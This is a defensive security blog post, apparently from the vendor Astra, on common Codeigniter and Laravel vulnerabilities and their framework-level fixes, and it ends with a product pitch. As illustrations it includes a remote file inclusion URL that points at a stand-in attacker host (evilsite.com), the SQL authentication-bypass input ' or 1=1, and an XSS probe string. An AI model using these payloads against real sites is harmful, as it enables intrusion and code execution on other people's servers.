Codeigniter or Laravel Website Hacked? Common Vulnerabilities of Codeigniter & Laravel with Fixes

Laravel and Codeigniter are both popular PHP frameworks used to build websites. Their popularity can also be attributed to the open source nature of the two frameworks. However, users must understand that deploying sites on these frameworks does not make them safe by itself; it is secure development practice that matters. SQL injection in Codeigniter and SQL injection in Laravel are the two most common security topics trending on the help forums. Apart from SQLi, unsafe development practices also leave these sites vulnerable to XSS, CSRF, RFI and similar attacks. According to John D. McGregor, author of Practical Guide to Testing Object-Oriented Software,

In many ways, being a good tester is harder than being a good developer because testing requires not only a very good understanding of the development process and its products, but it also demands an ability to anticipate likely faults and errors.

Hacked Codeigniter and Laravel Website: Examples

Attacks like SQL injection in Codeigniter or Laravel can compromise the website. Such attacks are fairly common and widespread. Therefore, a large number of users suffering similar attacks can be found asking for help on the Laravel community forum or the Codeigniter community forum. Some such examples are given below.

[Screenshots: forum posts reporting SQL injection in Codeigniter and Laravel sites]

Symptoms of Codeigniter or Laravel Hack

  • Laravel or Codeigniter phishing pages designed to steal sensitive info appear on the website.
  • Users complain about getting redirected to malicious sites.
  • Gibberish content appears on Laravel or Codeigniter site due to Japanese Keyword Hack or Pharma Hack etc.
  • The Laravel or Codeigniter website becomes very slow & shows error messages.
  • While using a third-party hosting, ‘Your account has been suspended!’ message appears.
  • The Laravel or Codeigniter site gets blacklisted by search engines.
  • Error logs show certain attacks like SQL Injection in Codeigniter on the site.
  • Logs show login to the website from remote IPs.
  • New, rogue admin accounts appear in the user database.


Basic Causes of Codeigniter or Laravel Hack

1) Codeigniter or Laravel Hack: Injection Attacks

a) SQL Injection in Codeigniter or Laravel

SQL Injection in Codeigniter is a very common attack and is widely prevalent across the web. As the name suggests, the attack targets the database behind the application. By exploiting SQL Injection in Codeigniter, the attacker can:

  • Retrieve data from the database.
  • Edit the contents of the database (this includes dropping the entire database!).
  • In some cases, obtain a reverse shell on the server.
  • Bypass authentication using input like ' or 1=1.

b) PHP Code Injection in Codeigniter/Laravel

PHP Code Injection is another common vulnerability that allows attackers to execute code on the Laravel/Codeigniter website. It differs from command injection in that the attacker can only run code in that particular language (here PHP), whereas command injection lets an attacker run operating-system commands, for example to obtain a reverse shell. For instance, a vulnerable parameter can be supplied with a link to a remote file containing PHP code that the server then executes, i.e. http://testsite.com/?page=http://evilsite.com/evilcode.php

This file may contain functions like phpinfo() which can be used to gather information about the server.
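The include pattern behind the ?page= example above, with a hardened version beside it. This is an added example, not code from the article; the parameter name, template names and directory are assumed.

```php
<?php
// Added example (not from the original article): the include pattern behind
// "?page=..." attacks, and a hardened version. Names and paths are assumed.

// VULNERABLE: the request parameter is passed straight to include(). With
// allow_url_include=On a remote URL such as http://evilsite.com/evilcode.php
// is fetched and executed as PHP on the server.
function render_page_vulnerable(string $page): void
{
    include $page;            // e.g. ?page=http://evilsite.com/evilcode.php
}

// HARDENED: map the untrusted parameter onto a fixed allowlist of templates
// that live in one directory; the raw request value is never used as a path.
const PAGE_TEMPLATES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $page): string
{
    // Unknown or missing page -> a safe default instead of an error.
    if ($page === null || !array_key_exists($page, PAGE_TEMPLATES)) {
        return PAGE_TEMPLATES['home'];
    }
    return PAGE_TEMPLATES[$page];
}

function render_page_hardened(?string $page, string $template_dir): void
{
    $path = $template_dir . DIRECTORY_SEPARATOR . resolve_page($page);
    include $path;
}

// Deployment check: with allow_url_include=Off, include() refuses URL
// wrappers even if application code is ever bypassed (defence in depth).
function remote_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// The attacker-style value from the article never reaches include().
assert(resolve_page('http://evilsite.com/evilcode.php') === 'home.php');
assert(resolve_page('about') === 'about.php');
```

Running resolve_page() on the URL from the article falls through to the default template, and remote_include_disabled() can be used as a startup check in production.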

2) Codeigniter or Laravel Hack: Cross-Site Scripting in Codeigniter/Laravel

XSS vulnerabilities occur in Laravel/Codeigniter websites due to a lack of input sanitization and output escaping. Both frameworks have security functions specifically designed to avoid these attacks. By exploiting an XSS vulnerability, attackers can:

  • Phish users to steal cookies and other sensitive session data.
  • Redirect users to a malicious site.
  • Bypass the same-origin policy.

3) Laravel or Codeigniter Hack: Cross-Site Request Forgery in Codeigniter/Laravel

This attack is aimed at tricking users into performing unwanted actions. However, this type of attack can only be used to manipulate data (submitting or deleting forms, etc.), not to steal or read it. In the worst-case scenario, if the victim is the admin, the entire application can be destroyed. The attack uses social engineering to lure victims into clicking a link that executes an action, such as deleting an account, in the background.


4) Protecting your Codeigniter/Laravel Website

Codeigniter or Laravel Hack: Avoiding SQL Injection in Codeigniter

Codeigniter comes with many security features, including functions and libraries to avoid SQL injection in Codeigniter. In this article, I will explain the 3 main methods one by one.

Codeigniter or Laravel Hack: Escaping Queries in Codeigniter

Escaping data before it is placed into a query neutralizes the characters that would otherwise change the query's meaning. Therefore, it is a secure practice that must be followed consistently. Escaping itself can be done via three methods:

  1. $this->db->escape(): Determines the data type before escaping, and adds quotes around string data.
  2. $this->db->escape_str(): Does not determine the data type and does not add quotes; it simply escapes the string.
  3. $this->db->escape_like_str(): Used for values inside LIKE conditions, where the wildcards % and _ also need escaping.

To further clarify, look at the code snippet given below.

<?php
$email = $this->input->post('email');
$query = 'SELECT * FROM subscribers_tbl WHERE user_name=' . $this->db->escape($email);
$this->db->query($query);
?>

In this code, the function $this->db->escape() first determines the data type in order to escape only the string data. Moreover, it also adds the single quotes around the input data automatically. This prevents SQL Injection in Codeigniter.

Codeigniter or Laravel Hack: Binding Queries in Codeigniter

Query binding not only escapes the input but also simplifies the code: the framework inserts the values into the query for you, reducing the work (and the chance of error) for the developer. For instance, look at the code snippet given below.

<?php
$sql = "SELECT * FROM subscribers_tbl WHERE status = ? AND email = ?";
$this->db->query($sql, array('active', '[email protected]'));
?>

Here you may notice question marks in the query instead of values. With query binding, these placeholders are replaced with the values from the array passed as the second argument. In the previous example we escaped the query manually; here the framework escapes each value automatically, thereby stopping SQL Injection in Codeigniter.

Codeigniter or Laravel Hack: Active Record Class in Codeigniter

The Active Record (Query Builder) feature of Codeigniter allows us to perform database operations with a minimum of code. Since the queries are built by the framework itself, escaping is done automatically. For example, all rows of a table can be retrieved with one simple call:

$query = $this->db->get('mytable');
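The three Codeigniter methods above (escaping, binding, Query Builder) side by side with the injectable pattern they replace, in one CodeIgniter 3 model. This is an added example, not the article's or the CodeIgniter project's code; the table and column names are assumed.

```php
<?php
// Added example (not from the article or CodeIgniter): one CI3 model showing the
// injectable pattern next to the three safe forms the article lists.
class Subscriber_model extends CI_Model
{
    // VULNERABLE: raw concatenation. With $email = "' OR 1=1 -- " the clause
    // becomes user_name='' OR 1=1 -- ' and matches every row (auth bypass).
    public function find_unsafe($email)
    {
        $sql = "SELECT * FROM subscribers_tbl WHERE user_name='" . $email . "'";
        return $this->db->query($sql)->row();
    }

    // 1) Manual escaping: escape() quotes the value and escapes the quote
    //    inside it, so the same payload is compared as a literal string.
    public function find_escaped($email)
    {
        $sql = 'SELECT * FROM subscribers_tbl WHERE user_name=' . $this->db->escape($email);
        return $this->db->query($sql)->row();
    }

    // 2) Query binding: each ? is replaced by an escaped value from the array.
    public function find_bound($email, $status = 'active')
    {
        $sql = 'SELECT * FROM subscribers_tbl WHERE user_name = ? AND status = ?';
        return $this->db->query($sql, array($email, $status))->row();
    }

    // 3) Query Builder (Active Record): escaping happens inside the framework.
    public function find_builder($email, $status = 'active')
    {
        return $this->db->where('user_name', $email)
                        ->where('status', $status)
                        ->get('subscribers_tbl')
                        ->row();
    }

    // LIKE searches need escape_like_str(), which also escapes % and _ so a
    // user cannot turn a prefix search into a match-everything search. CI3
    // uses ! as the LIKE escape character, hence the ESCAPE clause.
    public function search_prefix($prefix)
    {
        $like = $this->db->escape_like_str($prefix);
        $sql  = "SELECT * FROM subscribers_tbl WHERE user_name LIKE '{$like}%' ESCAPE '!'";
        return $this->db->query($sql)->result();
    }
}
```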

Codeigniter or Laravel Hack: Avoiding SQL Injection in Laravel

Laravel's query builder and Eloquent ORM use PDO parameter binding for user-supplied values, which in turn prevents SQL injection in Laravel. Parameter binding also quotes the values automatically, thereby preventing dangerous input like ' or 1=1 from bypassing authentication.

$results = DB::select('select * from users where id = :id', ['id' => 1]);

This is a named-binding query in Laravel: the :id placeholder is filled from the array passed as the second argument.

Codeigniter or Laravel Hack: Avoiding Cross-Site Scripting in Codeigniter

To prevent XSS attacks, Codeigniter comes with a built-in XSS filter. When this filter finds potentially malicious input, it converts it into harmless character entities, thereby keeping the application safe. The filter is accessed via the xss_clean() method:

$data = $this->security->xss_clean($data);

However, attackers sometimes embed malicious code within image files. To prevent such attacks, uploaded files can also be run through the filter. For instance, look at the code given below.

if ($this->security->xss_clean($file, TRUE) === FALSE)
{
    // file failed the XSS test
}

With the second argument set to TRUE, xss_clean() returns a Boolean: TRUE if the image is safe and FALSE otherwise. It is also noteworthy that the html_escape() method is the right choice if you wish to escape values placed in HTML attributes.
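Why the attribute context mentioned above matters, as an added example (not the article's code): ci_html_escape() is a stand-in for CodeIgniter's html_escape() helper, which calls htmlspecialchars() with ENT_QUOTES, and the probe value is constructed.

```php
<?php
// Added example (not the article's code): the output context decides which
// characters must be escaped. ci_html_escape() stands in for CodeIgniter's
// html_escape() helper (htmlspecialchars() with ENT_QUOTES).
function ci_html_escape($str, $charset = 'UTF-8')
{
    return htmlspecialchars($str, ENT_QUOTES, $charset);
}

// Server-side counterpart of maxlength="10": the browser attribute is only a
// hint, so the limit has to be enforced again on the server.
function task_within_limit($task, $max = 10)
{
    return mb_strlen($task, 'UTF-8') <= $max;
}

// UNSAFE: the value goes into an attribute without escaping. A double quote
// ends the attribute and whatever follows becomes a new attribute.
function render_unsafe($task)
{
    return '<input type="text" name="task" value="' . $task . '" maxlength="10">';
}

// SAFE: quotes become &quot; and angle brackets become &lt;/&gt;, so the whole
// value stays inside the attribute and is shown back to the user verbatim.
function render_safe($task)
{
    return '<input type="text" name="task" value="' . ci_html_escape($task) . '" maxlength="10">';
}

// Constructed probe value of the kind an XSS scan would send.
$probe = '" onfocus="alert(1)';

assert(strpos(render_unsafe($probe), '" onfocus="alert(1)"') !== false); // new attribute injected
assert(strpos(render_safe($probe), '" onfocus="') === false);           // no attribute break-out
assert(strpos(render_safe($probe), '&quot; onfocus=&quot;alert(1)') !== false);
assert(task_within_limit($probe) === false);                           // 19 chars > 10: reject server-side
```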

Codeigniter or Laravel Hack: Avoiding Cross Site Scripting Laravel

Escaping output prevents unsanitized input from being rendered as HTML, and this is how XSS attacks are avoided in Laravel websites. It is noteworthy that in Laravel versions above 5.1 this escaping is enabled by default. Therefore, when a value is output like this: <div>{{ $task->names }}</div> on Laravel versions above 5.1, the application is not vulnerable thanks to the automatic escaping. Moreover, limiting the length of user-supplied input can also prevent certain types of XSS and SQLi attacks. This can be done via the HTML code given below.

<input type="text" name="task" maxlength="10">

The same limit can be enforced via a JS function. Moreover, the {{ }} syntax in Laravel escapes any malicious HTML entities passed to it by default. Certain libraries are also specifically designed for this task and can be used to prevent Laravel XSS. If you use a templating engine like Blade, it automatically escapes output to prevent such attacks.

Codeigniter or Laravel Hack: Preventing CSRF Attacks in Codeigniter

CSRF protection can be enabled in Codeigniter by editing the application/config/config.php file. Simply append the following code to the file:

$config['csrf_protection'] = TRUE;

If you use the Form Helper, form_open() inserts a hidden CSRF token field into the form by default. The other way to implement CSRF protection is to use get_csrf_token_name() and get_csrf_hash(). For reference, look at the two code snippets given below: the server-side code that fetches the token and the form field that carries it.

$csrf = array(
    'name' => $this->security->get_csrf_token_name(),
    'hash' => $this->security->get_csrf_hash()
);

<input type="hidden" name="<?=$csrf['name'];?>" value="<?=$csrf['hash'];?>" />

Regenerating tokens on every request is another secure practice against Codeigniter CSRF attacks. However, token regeneration can be problematic, as users may need to re-validate forms after navigating to other tabs. Token regeneration is enabled with the following config parameter:

$config['csrf_regenerate'] = TRUE;

Codeigniter or Laravel Hack: Preventing CSRF Attacks in Laravel

Laravel protects forms from CSRF attacks with tokens. Each form carries a token, which is also sent with AJAX calls made from the page, and the server matches the token from the request against the one stored in the user's session to detect forged requests. CSRF tokens can be added to forms using the following code (Blade template implementation):

<form name="CSRF Implementation">
    {!! csrf_field() !!}
    <!-- Other inputs can come here -->
</form>

When the LaravelCollective/HTML package is used, the CSRF token is added to forms automatically.

Codeigniter or Laravel Hack: Block Error Reporting

Detailed error messages are helpful in the development environment. However, on a live site, Codeigniter error output can leak potentially sensitive information (paths, queries, table names) to attackers. Therefore, it is a safe practice to turn off error reporting in production.

PHP Errors

To turn off PHP error reporting, edit the index.php file and pass zero as the argument to the error_reporting() function. Look at the example given below for reference.

error_reporting(0);

For CodeIgniter version 2.0.1 and above, the preferred way is to set the ENVIRONMENT constant in the index.php file to "production", which disables PHP error output.

Database Errors

Database errors can be disabled by editing the application/config/database.php file. Simply set the db_debug option to FALSE. Look at the example given below for reference:

$db['default']['db_debug'] = FALSE;

Error Logging

A better approach is to send errors to the log files instead of displaying them. The log_threshold option in application/config/config.php can be set to 1 (errors only) for this purpose. Look at the example given below.

$config['log_threshold'] = 1;
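How the three settings discussed in this section are usually tied together through the ENVIRONMENT constant, so that verbose errors stay in development and never reach a production site. This is an added example, not the article's code; it follows the CodeIgniter 3 default file layout and shows the weak setting beside the safe one.

```php
<?php
// Added example (not from the article): CodeIgniter 3 error-handling settings
// keyed on the ENVIRONMENT constant. File paths follow the CI3 defaults.

// --- index.php: pick the environment from the server (CI_ENV), default to development.
define('ENVIRONMENT', isset($_SERVER['CI_ENV']) ? $_SERVER['CI_ENV'] : 'development');

switch (ENVIRONMENT) {
    case 'development':
        error_reporting(-1);               // report everything to the developer
        ini_set('display_errors', 1);
        break;

    case 'testing':
    case 'production':
        ini_set('display_errors', 0);      // never print errors to the browser
        error_reporting(E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_STRICT
                        & ~E_USER_NOTICE & ~E_USER_DEPRECATED);
        break;

    default:
        // An unknown environment is a deployment mistake; fail closed.
        header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
        echo 'The application environment is not set correctly.';
        exit(1);
}

// --- application/config/database.php
// WEAK:  $db['default']['db_debug'] = TRUE;   (prints the failing SQL and table names on error)
// SAFE:  enabled only outside production, so developers still see query errors.
$db['default']['db_debug'] = (ENVIRONMENT !== 'production');

// --- application/config/config.php
// WEAK:  $config['log_threshold'] = 0;        (nothing is logged; errors exist only on screen)
// SAFE:  log errors (1) in production, log everything (4) while developing.
$config['log_threshold'] = (ENVIRONMENT === 'production') ? 1 : 4;
```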

Use a Web Application Firewall for Laravel or Codeigniter

Even the experts may miss out on certain parameters which could make the Laravel/Codeigniter site vulnerable. Moreover, the attackers are constantly finding new ways to compromise your site. Therefore, another secure practice is to use a firewall or security solution of some sort. Astra is one such security solution designed to meet your flexible demands. Pay only for what you use. Astra is an out of the box security solution with rates starting as low as $9 per month. Just drop us a message and get one step closer to securing your PHP code. Get a demo now!

Astra provides a comprehensive security audit for your Laravel or Codeigniter website with 80+ active tests, a right mix of automated & manual testing.


About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.
